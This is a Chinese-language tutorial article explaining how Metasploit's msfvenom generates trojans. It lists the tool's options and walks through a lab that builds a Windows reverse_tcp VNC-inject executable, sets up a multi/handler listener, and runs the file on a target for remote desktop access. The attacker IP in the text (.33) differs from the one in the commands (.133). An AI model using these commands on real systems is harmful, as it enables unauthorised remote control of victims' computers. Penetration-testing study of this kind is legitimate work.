Metasploit中木馬生成的原理是什么,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
一、生成方式:利用msf模塊中的msfvenom模塊
二、原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程序,并在目標機上執行,在本地監聽上線
三、msfvenom命令行選項如下
-p, --payload <payload> 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定
-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
-n, --nopsled <length> 為payload預先指定一個NOP滑動長度
-f, --format <format> 指定輸出格式 (使用 --help-formats 來獲取msf支持的輸出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)
-a, --arch <architecture> 指定payload的目標架構
--platform <platform> 指定payload的目標平臺
-s, --space <length> 設定有效攻擊荷載的最大長度
-b, --bad-chars <list> 設定規避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的編碼次數
-c, --add-code <path> 指定一個附加的win32 shellcode文件
-x, --template <path> 指定一個自定義的可執行文件作為模板
-k, --keep 保護模板程序的動作,注入的payload作為一個新的進程運行
--payload-options 列舉payload的標準選項
-o, --out <path> 保存payload
-v, --var-name <name> 指定一個自定義的變量,以確定輸出格式
--shellest 最小化生成payload
-h, --help 查看幫助選項
--help-formats 查看msf支持的輸出格式列表
四、使用方法
1、msfvenom --list platforms 顯示支持的平臺
2、msfvenom --list formats 顯示支持的格式
3、msfvenom --list archs 顯示支持的架構
4、msfvenom --list encoders 顯示支持的編碼器
5、生成木馬
目標主機:192.168.1.129(win7 x64)
攻擊機:192.168.1.33
攻擊端口:12121
生成木馬:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
6、進入監聽模塊 use exploit/multi/handler
7、設置payload反彈 set payload windows/x64/vncinject/reverse_tcp
8、查看需要設置的參數:show options
9、設置攻擊機ip:set lhost 192.168.1.133
10、設置攻擊端口:set lport 12121
11、將生成的exe文件上傳到目標主機并運行
12、run攻擊
13、攻擊機的監控畫面
14、目標主機畫面
看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。